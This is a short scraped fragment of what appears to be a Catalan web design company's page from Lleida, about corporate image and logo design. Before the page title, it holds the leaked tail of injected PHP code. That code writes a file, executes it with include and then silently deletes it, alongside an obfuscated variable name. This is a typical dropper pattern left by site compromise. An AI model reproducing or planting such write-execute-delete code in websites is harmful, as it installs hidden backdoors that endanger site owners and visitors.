");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Disseny d'imatges corporatives i logos - Disseny de pàgines web Lleida, imatges corporatives i disseny gràfic / comunicació visual - pag 2